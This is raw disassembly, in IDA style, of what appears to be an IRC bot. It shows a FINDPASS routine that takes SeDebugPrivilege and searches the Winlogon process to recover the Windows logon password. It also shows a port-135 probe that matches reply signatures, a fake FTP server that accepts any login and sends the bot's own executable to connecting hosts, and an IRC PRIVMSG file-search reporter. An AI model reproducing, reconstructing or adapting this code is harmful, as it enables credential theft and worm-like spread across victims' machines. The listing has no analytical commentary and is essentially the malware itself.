mov dword_4392DC, eax
call sub_403852
test eax, eax
mov [ebp+74h+arg_0], eax
jz loc_403F7C
mov esi, dword_422080
mov edi, 400h
push edi
mov ebx, offset dword_438AD8
push ebx
push offset aUsername ; "USERNAME"
call esi ; GetEnvironmentVariableW
push edi
mov edi, offset dword_4392E0
push edi
push offset aUserdomain ; "USERDOMAIN"
call esi ; GetEnvironmentVariableW
cmp [ebp+74h+var_4], 1
push offset dword_439AEC
push [ebp+74h+arg_0]
jnz short loc_403F28
call sub_4039DB
jmp short loc_403F2D
; ---------------------------------------------------------------------------
loc_403F28: ; CODE XREF: sub_403E31+EE�j
call sub_403B79
loc_403F2D: ; CODE XREF: sub_403E31+F5�j
test eax, eax
pop ecx
pop ecx
jz short loc_403F75
cmp dword_439AEC, 0
jnz short loc_403F5C
push ebx
push edi
push [ebp+74h+arg_0]
lea eax, [ebp+74h+var_29C]
push offset aFindpassTheW_1 ; "[FINDPASS]: The Windows logon (Pid: <%d"...
push 200h
push eax
call sub_416BCD
add esp, 18h
jmp short loc_403F8F
; ---------------------------------------------------------------------------
loc_403F5C: ; CODE XREF: sub_403E31+109�j
cmp [ebp+74h+var_4], 1
push [ebp+74h+arg_0]
jnz short loc_403F6C
call sub_403C9E
jmp short loc_403F71
; ---------------------------------------------------------------------------
loc_403F6C: ; CODE XREF: sub_403E31+132�j
call sub_403D30
loc_403F71: ; CODE XREF: sub_403E31+139�j
pop ecx
push eax
jmp short loc_403F81
; ---------------------------------------------------------------------------
loc_403F75: ; CODE XREF: sub_403E31+100�j
push offset aFindpassUnable ; "[FINDPASS]: Unable to find the password"...
jmp short loc_403F81
; ---------------------------------------------------------------------------
loc_403F7C: ; CODE XREF: sub_403E31+B5�j
push offset aFindpassUnab_0 ; "[FINDPASS]: Unable to find Winlogon Pro"...
loc_403F81: ; CODE XREF: sub_403E31+142�j
; sub_403E31+149�j
lea eax, [ebp+74h+var_29C]
push eax
call sub_416975
pop ecx
pop ecx
loc_403F8F: ; CODE XREF: sub_403E31+129�j
push 0
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_408CDE
pop ecx
pop ecx
push [ebp+74h+var_8]
call dword_42207C ; FreeLibrary
jmp short loc_403FBB
; ---------------------------------------------------------------------------
loc_403FA8: ; CODE XREF: sub_403E31+4E�j
push offset aFindpassFailed ; "[FINDPASS]: Failed to enable Debug Priv"...
loc_403FAD: ; CODE XREF: sub_403E31+3A�j
lea eax, [ebp+74h+var_29C]
push eax
call sub_416975
pop ecx
pop ecx
loc_403FBB: ; CODE XREF: sub_403E31+175�j
xor esi, esi
cmp [ebp+74h+var_10], esi
jnz short loc_403FDC
push esi
push [ebp+74h+var_14]
lea eax, [ebp+74h+var_29C]
push eax
lea eax, [ebp+74h+var_98]
push eax
push [ebp+74h+var_9C]
call sub_405D62
add esp, 14h
loc_403FDC: ; CODE XREF: sub_403E31+18F�j
lea eax, [ebp+74h+var_29C]
push eax
call sub_401F0F
push [ebp+74h+var_18]
call sub_4139F6
pop ecx
pop ecx
push esi
call dword_422014 ; ExitThread
int 3 ; Trap to Debugger
sub_403E31 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403FFA proc near ; CODE XREF: sub_40402D+11C�p
; sub_40402D+145�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov edx, [ebp+arg_4]
sub edx, [ebp+arg_C]
push ebx
push esi
xor eax, eax
test edx, edx
push edi
jle short loc_404022
loc_40400C: ; CODE XREF: sub_403FFA+26�j
mov esi, [ebp+arg_0]
mov ecx, [ebp+arg_C]
mov edi, [ebp+arg_8]
add esi, eax
xor ebx, ebx
repe cmpsb
jz short loc_404029
inc eax
cmp eax, edx
jl short loc_40400C
loc_404022: ; CODE XREF: sub_403FFA+10�j
xor al, al
loc_404024: ; CODE XREF: sub_403FFA+31�j
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_404029: ; CODE XREF: sub_403FFA+21�j
mov al, 1
jmp short loc_404024
sub_403FFA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40402D proc near ; CODE XREF: .text:00414624�p
; .text:00414710�p ...
var_2010 = byte ptr -2010h
var_200E = byte ptr -200Eh
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 2010h
call sub_416B90
mov eax, [ebp+arg_4]
dec eax
jz short loc_40406A
dec eax
jz short loc_404048
dec eax
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_404048: ; CODE XREF: sub_40402D+14�j
push 3
push 1388h
push [ebp+arg_0]
call dword_43A434 ; inet_addr
push eax
call sub_4018C1
add esp, 0Ch
neg eax
sbb eax, eax
and eax, 3
leave
retn
; ---------------------------------------------------------------------------
loc_40406A: ; CODE XREF: sub_40402D+11�j
push ebx
push esi
push 6
push 1
push 2
call dword_43A3BC ; socket
mov esi, eax
or ebx, 0FFFFFFFFh
xor eax, eax
cmp esi, ebx
mov [ebp+arg_4], esi
jz loc_40418F
push edi
lea edi, [ebp+var_10]
stosd
stosd
stosd
stosd
push 87h
mov [ebp+var_10], 2
call dword_43A514 ; ntohs
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_40877E
pop ecx
mov [ebp+var_C], eax
push 10h
lea eax, [ebp+var_10]
push eax
push esi
call dword_43A36C ; connect
cmp eax, ebx
jz short loc_4040D9
xor edi, edi
push edi
push 48h
push offset dword_42E508
push esi
call dword_43A458 ; send
cmp eax, ebx
jnz short loc_4040E0
loc_4040D9: ; CODE XREF: sub_40402D+95�j
; sub_40402D+CC�j ...
xor esi, esi
jmp loc_404183
; ---------------------------------------------------------------------------
loc_4040E0: ; CODE XREF: sub_40402D+AA�j
push edi
mov esi, 2000h
push esi
lea eax, [ebp+var_2010]
push eax
push [ebp+arg_4]
call dword_43A324 ; recv
cmp eax, ebx
jz short loc_4040D9
cmp [ebp+var_200E], 0Ch
jnz short loc_4040D9
push edi
push 18h
push offset dword_42E554
push [ebp+arg_4]
call dword_43A458 ; send
cmp eax, ebx
jz short loc_4040D9
push edi
push esi
lea eax, [ebp+var_2010]
push eax
push [ebp+arg_4]
call dword_43A324 ; recv
mov esi, eax
cmp esi, ebx
jz short loc_4040D9
cmp [ebp+var_200E], 2
jnz short loc_4040D9
push 10h
push offset loc_42E570
lea eax, [ebp+var_2010]
push esi
push eax
call sub_403FFA
add esp, 10h
test al, al
jz short loc_404163
xor eax, eax
cmp esi, 12Ch
setnl al
inc eax
jmp short loc_404181
; ---------------------------------------------------------------------------
loc_404163: ; CODE XREF: sub_40402D+126�j
push 10h
push offset dword_42E584
lea eax, [ebp+var_2010]
push esi
push eax
call sub_403FFA
add esp, 10h
neg al
sbb eax, eax
and eax, 3
loc_404181: ; CODE XREF: sub_40402D+134�j
mov esi, eax
loc_404183: ; CODE XREF: sub_40402D+AE�j
push [ebp+arg_4]
call dword_43A4D0 ; closesocket
mov eax, esi
pop edi
loc_40418F: ; CODE XREF: sub_40402D+57�j
pop esi
pop ebx
leave
retn
sub_40402D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404193 proc near ; CODE XREF: sub_4042A2+4A2�p
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1A0h
lea eax, [ebp+var_1A0]
push eax
push 101h
call dword_422204 ; WSAStartup
push 0
push 1
push 2
call dword_422208 ; socket
push [ebp+arg_0]
mov dword_439F00, eax
mov [ebp+var_10], 2
call dword_42220C ; inet_addr
push [ebp+arg_4]
mov [ebp+var_C], eax
call dword_422210 ; ntohs
mov [ebp+var_E], ax
push 10h
lea eax, [ebp+var_10]
push eax
push dword_439F00
call dword_422214 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40420B
push dword_439F00
call dword_422218 ; closesocket
call dword_42221C ; WSACleanup
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_40420B: ; CODE XREF: sub_404193+60�j
xor eax, eax
inc eax
leave
retn
sub_404193 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404210 proc near ; CODE XREF: sub_4042A2+4AE�p
var_504 = byte ptr -504h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 504h
push esi
push 104h
lea eax, [ebp+var_104]
push eax
push 0
call dword_422010 ; GetModuleFileNameA
lea eax, [ebp+var_104]
push offset dword_422990
push eax
call sub_41720C
mov esi, eax
test esi, esi
pop ecx
pop ecx
jnz short loc_40427D
jmp short loc_40429F
; ---------------------------------------------------------------------------
loc_404249: ; CODE XREF: sub_404210+72�j
push 400h
lea eax, [ebp+var_504]
push 1
push eax
call sub_416FB7
add esp, 10h
push 0
push eax
lea eax, [ebp+var_504]
push eax
push dword_439F00
call dword_422200 ; send
push 0Ah
call dword_422000 ; Sleep
loc_40427D: ; CODE XREF: sub_404210+35�j
test byte ptr [esi+0Ch], 10h
push esi
jz short loc_404249
call sub_416E7D
pop ecx
push dword_439F00
call dword_422218 ; closesocket
call dword_42221C ; WSACleanup
xor eax, eax
inc eax
loc_40429F: ; CODE XREF: sub_404210+37�j
pop esi
leave
retn
sub_404210 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_4042A2 proc near ; DATA XREF: sub_401141+24E�o
var_A6C = byte ptr -0A6Ch
var_8DC = byte ptr -8DCh
var_6DC = dword ptr -6DCh
var_6D8 = byte ptr -6D8h
var_4C4 = byte ptr -4C4h
var_444 = dword ptr -444h
var_440 = dword ptr -440h
var_438 = dword ptr -438h
var_334 = byte ptr -334h
var_2D0 = byte ptr -2D0h
var_29C = byte ptr -29Ch
var_238 = byte ptr -238h
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_124 = byte ptr -124h
var_F8 = byte ptr -0F8h
var_C4 = byte ptr -0C4h
var_AC = byte ptr -0ACh
var_48 = byte ptr -48h
var_38 = word ptr -38h
var_36 = word ptr -36h
var_34 = dword ptr -34h
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 0A6Ch
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
mov esi, eax
xor ebx, ebx
inc ebx
mov ecx, 0A9h
lea edi, [ebp+74h+var_6DC]
rep movsd
mov [eax+2A0h], ebx
lea eax, [ebp+74h+var_A6C]
push eax
xor esi, esi
push 101h
mov [ebp+74h+var_18], ebx
mov [ebp+74h+var_1C], ebx
mov [ebp+74h+var_228], esi
mov [ebp+74h+var_438], esi
call dword_422204 ; WSAStartup
push esi
call sub_4177B0
push eax
call sub_416B24
mov eax, [ebp+74h+arg_0]
mov eax, [eax+214h]
pop ecx
pop ecx
push esi
push ebx
push 2
mov dword_439F04, eax
call dword_422208 ; socket
mov ebx, eax
push 4
lea eax, [ebp+74h+var_18]
push eax
push 4
push 0FFFFh
push ebx
mov [ebp+74h+var_8], ebx
call dword_4221E0 ; setsockopt
lea eax, [ebp+74h+var_1C]
push eax
push 8004667Eh
push ebx
call dword_4221E4 ; ioctlsocket
xor eax, eax
mov ax, word ptr dword_439F04
mov [ebp+74h+var_38], 2
mov [ebp+74h+var_34], esi
push eax
call dword_422210 ; ntohs
mov [ebp+74h+var_36], ax
push 10h
lea eax, [ebp+74h+var_38]
push eax
push ebx
call dword_4221E8 ; bind
test eax, eax
jl loc_40483C
push 0Ah
push ebx
call dword_4221EC ; listen
push 41h
pop ecx
xor eax, eax
push eax
push eax
push eax
lea eax, [ebp+74h+var_438]
mov [ebp+74h+var_224], ebx
mov [ebp+74h+var_4], ebx
push eax
inc ebx
lea esi, [ebp+74h+var_228]
lea edi, [ebp+74h+var_438]
mov [ebp+74h+var_228], 1
push ebx
rep movsd
call dword_4221F0 ; select
cmp eax, 0FFFFFFFFh
jz loc_40483C
mov ebx, dword_422200
loc_4043C1: ; CODE XREF: sub_4042A2+594�j
xor esi, esi
cmp [ebp+74h+var_4], esi
mov [ebp+74h+arg_0], esi
jl loc_40480B
loc_4043CF: ; CODE XREF: sub_4042A2+563�j
push 19h
pop ecx
xor eax, eax
push 19h
lea edi, [ebp+74h+var_29C]
rep stosd
pop ecx
lea edi, [ebp+74h+var_AC]
rep stosd
lea eax, [ebp+74h+var_438]
push eax
push esi
call sub_421930 ; __WSAFDIsSet
test eax, eax
jz loc_4047FE
cmp esi, [ebp+74h+var_8]
jnz short loc_404469
push 10h
pop edi
lea eax, [ebp+74h+var_24]
push eax
lea eax, [ebp+74h+var_238]
push eax
push [ebp+74h+var_8]
mov [ebp+74h+var_24], edi
call dword_4221F8 ; accept
cmp eax, 0FFFFFFFFh
jz loc_4047FE
mov edx, [ebp+74h+var_228]
xor ecx, ecx
test edx, edx
jbe short loc_40443B
loc_40442D: ; CODE XREF: sub_4042A2+197�j
cmp [ebp+ecx*4+74h+var_224], eax
jz short loc_40443B
inc ecx
cmp ecx, edx
jb short loc_40442D
loc_40443B: ; CODE XREF: sub_4042A2+189�j
; sub_4042A2+192�j
cmp ecx, edx
jnz short loc_404451
cmp edx, 40h
jnb short loc_404451
mov [ebp+ecx*4+74h+var_224], eax
inc [ebp+74h+var_228]
loc_404451: ; CODE XREF: sub_4042A2+19B�j
; sub_4042A2+1A0�j
cmp eax, [ebp+74h+var_4]
jle short loc_404459
mov [ebp+74h+var_4], eax
loc_404459: ; CODE XREF: sub_4042A2+1B2�j
push 0
push edi
push offset a220Winftpd1_2 ; "220 WinFtpd 1.2\n"
push eax
call ebx ; send
jmp loc_4047FE
; ---------------------------------------------------------------------------
loc_404469: ; CODE XREF: sub_4042A2+15A�j
push 0
push 64h
lea eax, [ebp+74h+var_29C]
push eax
push esi
call dword_4221FC ; recv
test eax, eax
jg short loc_4044C7
mov ecx, [ebp+74h+var_228]
xor eax, eax
test ecx, ecx
jbe short loc_4044BB
loc_40448B: ; CODE XREF: sub_4042A2+1F5�j
cmp [ebp+eax*4+74h+var_224], esi
jz short loc_4044B0
inc eax
cmp eax, ecx
jb short loc_40448B
jmp short loc_4044BB
; ---------------------------------------------------------------------------
loc_40449B: ; CODE XREF: sub_4042A2+211�j
mov ecx, [ebp+eax*4+74h+var_220]
mov [ebp+eax*4+74h+var_224], ecx
mov ecx, [ebp+74h+var_228]
inc eax
loc_4044B0: ; CODE XREF: sub_4042A2+1F0�j
dec ecx
cmp eax, ecx
jb short loc_40449B
dec [ebp+74h+var_228]
loc_4044BB: ; CODE XREF: sub_4042A2+1E7�j
; sub_4042A2+1F7�j
push esi
call dword_422218 ; closesocket
jmp loc_4047FE
; ---------------------------------------------------------------------------
loc_4044C7: ; CODE XREF: sub_4042A2+1DB�j
lea eax, [ebp+74h+var_334]
push eax
lea eax, [ebp+74h+var_AC]
push eax
lea eax, [ebp+74h+var_29C]
push offset aSS_1 ; "%s %s"
push eax
call sub_416B53
add esp, 10h
push 5
pop edx
mov edi, offset aUser_0 ; "USER"
lea esi, [ebp+74h+var_AC]
mov ecx, edx
xor eax, eax
repe cmpsb
jnz short loc_404506
push eax
push 16h
push offset a331PasswordReq ; "331 Password required\n"
jmp loc_4047E9
; ---------------------------------------------------------------------------
loc_404506: ; CODE XREF: sub_4042A2+255�j
mov edi, offset aPass ; "PASS"
lea esi, [ebp+74h+var_AC]
mov ecx, edx
xor eax, eax
repe cmpsb
jnz short loc_404523
push eax
push 14h
push offset a230UserLoggedI ; "230 User logged in.\n"
jmp loc_4047E9
; ---------------------------------------------------------------------------
loc_404523: ; CODE XREF: sub_4042A2+272�j
mov edi, offset aSyst ; "SYST"
lea esi, [ebp+74h+var_AC]
mov ecx, edx
xor eax, eax
repe cmpsb
jnz short loc_404540
push eax
push 0Dh
push offset a215Stnyftpd ; "215 StnyFtpd\n"
jmp loc_4047E9
; ---------------------------------------------------------------------------
loc_404540: ; CODE XREF: sub_4042A2+28F�j
mov edi, offset aRest ; "REST"
lea esi, [ebp+74h+var_AC]
mov ecx, edx
xor eax, eax
repe cmpsb
jnz short loc_40455D
push eax
push 10h
push offset a350Restarting_ ; "350 Restarting.\n"
jmp loc_4047E9
; ---------------------------------------------------------------------------
loc_40455D: ; CODE XREF: sub_4042A2+2AC�j
push 4
mov edi, offset off_4231D8
lea esi, [ebp+74h+var_AC]
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40457B
push eax
push 1Eh
push offset a257IsCurrentDi ; "257 \"/\" is current directory.\n"
jmp loc_4047E9
; ---------------------------------------------------------------------------
loc_40457B: ; CODE XREF: sub_4042A2+2CA�j
mov eax, offset aType ; "TYPE"
mov ecx, edx
mov edi, eax
lea esi, [ebp+74h+var_AC]
xor edx, edx
repe cmpsb
jnz short loc_4045AE
push 2
mov edi, offset aA_0 ; "A"
lea esi, [ebp+74h+var_334]
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_4045AE
push edx
push 13h
push offset a200TypeSetToA_ ; "200 Type set to A.\n"
jmp loc_4047E9
; ---------------------------------------------------------------------------
loc_4045AE: ; CODE XREF: sub_4042A2+2E9�j
; sub_4042A2+2FD�j
mov edi, eax
push 5
pop eax
lea esi, [ebp+74h+var_AC]
mov ecx, eax
xor edx, edx
repe cmpsb
jnz short loc_4045DF
push 2
mov edi, offset aI ; "I"
lea esi, [ebp+74h+var_334]
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_4045DF
push edx
push 13h
push offset a200TypeSetToI_ ; "200 Type set to I.\n"
jmp loc_4047E9
; ---------------------------------------------------------------------------
loc_4045DF: ; CODE XREF: sub_4042A2+31A�j
; sub_4042A2+32E�j
mov edi, offset aPasv ; "PASV"
lea esi, [ebp+74h+var_AC]
mov ecx, eax
xor edx, edx
repe cmpsb
jnz short loc_40461E
push 0Ah
pop ecx
mov esi, offset a425PassiveNotS ; "425 Passive not supported on this serve"...
lea edi, [ebp+74h+var_124]
rep movsd
lea eax, [ebp+74h+var_124]
movsw
lea edx, [eax+1]
loc_40460A: ; CODE XREF: sub_4042A2+36D�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40460A
sub eax, edx
push 0
push eax
lea eax, [ebp+74h+var_124]
jmp short loc_404652
; ---------------------------------------------------------------------------
loc_40461E: ; CODE XREF: sub_4042A2+34B�j
mov edi, offset aList ; "LIST"
lea esi, [ebp+74h+var_AC]
mov ecx, eax
xor edx, edx
repe cmpsb
mov ecx, eax
jnz short loc_404658
mov esi, offset a226TransferCom ; "226 Transfer complete\n"
lea edi, [ebp+74h+var_C4]
rep movsd
movsw
lea eax, [ebp+74h+var_C4]
movsb
lea edx, [eax+1]
loc_404643: ; CODE XREF: sub_4042A2+3A6�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404643
sub eax, edx
push 0
push eax
lea eax, [ebp+74h+var_C4]
loc_404652: ; CODE XREF: sub_4042A2+37A�j
push eax
jmp loc_4047E9
; ---------------------------------------------------------------------------
loc_404658: ; CODE XREF: sub_4042A2+38C�j
mov edi, offset aPort ; "PORT"
lea esi, [ebp+74h+var_AC]
xor edx, edx
repe cmpsb
jnz loc_40471C
lea eax, [ebp+74h+var_2D0]
push eax
lea eax, [ebp+74h+var_F8]
push eax
lea eax, [ebp+74h+var_28]
push eax
lea eax, [ebp+74h+var_20]
push eax
lea eax, [ebp+74h+var_14]
push eax
lea eax, [ebp+74h+var_C]
push eax
lea eax, [ebp+74h+var_29C]
push offset aS ; "%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
push eax
call sub_416B53
lea eax, [ebp+74h+var_F8]
push eax
call sub_416D02
mov esi, eax
lea eax, [ebp+74h+var_2D0]
push eax
call sub_416D02
push 0Ch
mov edx, eax
pop ecx
xor eax, eax
lea edi, [ebp+74h+var_F8]
rep stosd
push edx
push esi
stosw
lea eax, [ebp+74h+var_F8]
push offset aXX ; "%x%x\n"
push eax
call sub_416975
push 10h
lea eax, [ebp+74h+var_F8]
push 0
push eax
call sub_417799
mov [ebp+74h+var_10], eax
add esp, 44h
lea eax, [ebp+74h+var_28]
push eax
lea eax, [ebp+74h+var_20]
push eax
lea eax, [ebp+74h+var_14]
push eax
lea eax, [ebp+74h+var_C]
push eax
lea eax, [ebp+74h+var_48]
push offset aS_S_S_S ; "%s.%s.%s.%s"
push eax
call sub_416975
add esp, 18h
push 0
push 1Dh
push offset a200PortCommand ; "200 PORT command successful.\n"
jmp loc_4047E9
; ---------------------------------------------------------------------------
loc_40471C: ; CODE XREF: sub_4042A2+3C2�j
mov edi, offset aRetr ; "RETR"
lea esi, [ebp+74h+var_AC]
mov ecx, eax
xor edx, edx
repe cmpsb
jnz loc_4047D1
push edx
push 28h
push offset a150OpeningBina ; "150 Opening BINARY mode data connection"...
push [ebp+74h+arg_0]
call ebx ; send
push [ebp+74h+var_10]
lea eax, [ebp+74h+var_48]
push eax
call sub_404193
cmp eax, 1
pop ecx
pop ecx
jnz short loc_4047C6
call sub_404210
cmp eax, 1
jnz loc_4047EE
xor esi, esi
push esi
push 17h
push offset a226TransferC_0 ; "226 Transfer complete.\n"
push [ebp+74h+arg_0]
call ebx ; send
lea eax, [ebp+74h+var_6D8]
push eax
lea eax, [ebp+74h+var_48]
push eax
lea eax, [ebp+74h+var_8DC]
push offset aFtpFileTransfe ; "[FTP]: File transfer complete to IP: %s"...
push eax
call sub_416975
add esp, 10h
cmp [ebp+74h+var_440], esi
jnz short loc_4047B7
push esi
push [ebp+74h+var_444]
lea eax, [ebp+74h+var_8DC]
push eax
lea eax, [ebp+74h+var_4C4]
push eax
push [ebp+74h+var_6DC]
call sub_405D62
add esp, 14h
loc_4047B7: ; CODE XREF: sub_4042A2+4F0�j
lea eax, [ebp+74h+var_8DC]
push eax
call sub_401F0F
pop ecx
jmp short loc_4047EE
; ---------------------------------------------------------------------------
loc_4047C6: ; CODE XREF: sub_4042A2+4AC�j
push 0
push 20h
push offset a425CanTOpenDat ; "425 Can't open data connection.\n"
jmp short loc_4047E9
; ---------------------------------------------------------------------------
loc_4047D1: ; CODE XREF: sub_4042A2+488�j
mov ecx, eax
mov edi, offset aQuit ; "QUIT"
lea esi, [ebp+74h+var_AC]
xor eax, eax
repe cmpsb
jnz short loc_4047EE
push eax
push 0Dh
push offset a221Goodbye_ ; "221 Goodbye.\n"
loc_4047E9: ; CODE XREF: sub_4042A2+25F�j
; sub_4042A2+27C�j ...
push [ebp+74h+arg_0]
call ebx ; send
loc_4047EE: ; CODE XREF: sub_4042A2+4B6�j
; sub_4042A2+522�j ...
mov esi, [ebp+74h+arg_0]
push 19h
pop ecx
xor eax, eax
lea edi, [ebp+74h+var_29C]
rep stosd
loc_4047FE: ; CODE XREF: sub_4042A2+151�j
; sub_4042A2+179�j ...
inc esi
cmp esi, [ebp+74h+var_4]
mov [ebp+74h+arg_0], esi
jle loc_4043CF
loc_40480B: ; CODE XREF: sub_4042A2+127�j
push 41h
pop ecx
xor eax, eax
push eax
push eax
push eax
lea eax, [ebp+74h+var_438]
push eax
mov eax, [ebp+74h+var_4]
inc eax
lea esi, [ebp+74h+var_228]
lea edi, [ebp+74h+var_438]
push eax
rep movsd
call dword_4221F0 ; select
cmp eax, 0FFFFFFFFh
jnz loc_4043C1
loc_40483C: ; CODE XREF: sub_4042A2+C9�j
; sub_4042A2+113�j
pop edi
xor eax, eax
pop esi
inc eax
pop ebx
add ebp, 74h
leave
retn 4
sub_4042A2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404849 proc near ; CODE XREF: sub_405163+149�p
; sub_409848+3F36�p
var_598 = byte ptr -598h
var_494 = byte ptr -494h
var_38C = dword ptr -38Ch
var_378 = byte ptr -378h
var_36C = dword ptr -36Ch
var_360 = byte ptr -360h
var_24C = byte ptr -24Ch
var_4C = byte ptr -4Ch
var_24 = byte ptr -24h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_16 = word ptr -16h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 598h
push ebx
push esi
push edi
push 41h
pop ecx
xor eax, eax
lea edi, [ebp+var_598]
rep stosd
mov edi, [ebp+arg_0]
xor ebx, ebx
push offset asc_4236F0 ; "\n"
push edi
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
call sub_4177E9
cmp [ebp+arg_8], ebx
pop ecx
pop ecx
jz short loc_4048A2
push edi
push [ebp+arg_8]
mov esi, 200h
push offset aPrivmsgSSearch ; "PRIVMSG %s :Searching for: %s\r\n"
lea eax, [ebp+var_24C]
push esi
push eax
call sub_416BCD
add esp, 14h
jmp loc_4049BF
; ---------------------------------------------------------------------------
loc_4048A2: ; CODE XREF: sub_404849+34�j
cmp [ebp+arg_C], ebx
jz loc_4049A4
mov eax, edi
lea ecx, [eax+1]
loc_4048B0: ; CODE XREF: sub_404849+6C�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4048B0
push edi
sub eax, ecx
and [eax+edi-1], dl
push offset aHtmlHeadTitleI ; "<HTML>\r\n<HEAD>\r\n<TITLE>Index of %s</TIT"...
mov esi, 200h
lea eax, [ebp+var_24C]
push esi
push eax
call sub_416BCD
lea eax, [ebp+var_24C]
add esp, 10h
lea ecx, [eax+1]
loc_4048E1: ; CODE XREF: sub_404849+9D�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4048E1
push ebx
sub eax, ecx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43A458 ; send
push edi
push offset aH1IndexOfSH1Ta ; "<H1>Index of %s</H1>\r\n<TABLE BORDER=\"0\""...
lea eax, [ebp+var_24C]
push esi
push eax
call sub_416BCD
lea eax, [ebp+var_24C]
add esp, 10h
lea ecx, [eax+1]
loc_40491B: ; CODE XREF: sub_404849+D7�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40491B
push ebx
sub eax, ecx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43A458 ; send
mov eax, edi
lea ecx, [eax+1]
loc_40493B: ; CODE XREF: sub_404849+F7�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40493B
push 3Ch
push 96h
push 0E6h
sub eax, ecx
push offset aTrTdWidthDCode ; "<TR>\r\n<TD WIDTH=\"%d\"><CODE>Name</CODE><"...
mov byte ptr [eax+edi], 2Ah
lea eax, [ebp+var_24C]
push esi
push eax
call sub_416BCD
lea eax, [ebp+var_24C]
add esp, 18h
lea ecx, [eax+1]
loc_404972: ; CODE XREF: sub_404849+12E�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_404972
push ebx
sub eax, ecx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43A458 ; send
push offset aTrTdColspan3Hr ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
lea eax, [ebp+var_24C]
push esi
push eax
call sub_416BCD
add esp, 0Ch
jmp short loc_4049BF
; ---------------------------------------------------------------------------
loc_4049A4: ; CODE XREF: sub_404849+5C�j
push edi
push offset aSearchingForS ; "Searching for: %s\r\n"
mov esi, 200h
lea eax, [ebp+var_24C]
push esi
push eax
call sub_416BCD
add esp, 10h
loc_4049BF: ; CODE XREF: sub_404849+54�j
; sub_404849+159�j
lea eax, [ebp+var_24C]
lea edx, [eax+1]
loc_4049C8: ; CODE XREF: sub_404849+184�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4049C8
push ebx
sub eax, edx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43A458 ; send
mov eax, [ebp+arg_C]
cmp eax, ebx
jz loc_404A72
lea edx, [eax+1]
loc_4049F1: ; CODE XREF: sub_404849+1AD�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4049F1
sub eax, edx
cmp eax, 2
jbe short loc_404A72
mov eax, [ebp+arg_C]
lea edx, [eax+1]
loc_404A05: ; CODE XREF: sub_404849+1C1�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404A05
sub eax, edx
add eax, 0FFFFFFFDh
cmp eax, ebx
jz short loc_404A21
loc_404A15: ; CODE XREF: sub_404849+1D6�j
mov ecx, [ebp+arg_C]
cmp byte ptr [eax+ecx], 2Fh
jz short loc_404A21
dec eax
jnz short loc_404A15
loc_404A21: ; CODE XREF: sub_404849+1CA�j
; sub_404849+1D3�j
inc eax
push eax
push [ebp+arg_C]
lea eax, [ebp+var_598]
push eax
call sub_416A00
lea eax, [ebp+var_598]
push eax
push offset aTrTdColspan3AH ; "<TR>\r\n<TD COLSPAN=\"3\"><A HREF=\"%s\"><COD"...
lea eax, [ebp+var_24C]
push esi
push eax
call sub_416BCD
lea eax, [ebp+var_24C]
add esp, 1Ch
lea ecx, [eax+1]
loc_404A57: ; CODE XREF: sub_404849+213�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_404A57
push ebx
sub eax, ecx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43A458 ; send
loc_404A72: ; CODE XREF: sub_404849+19F�j
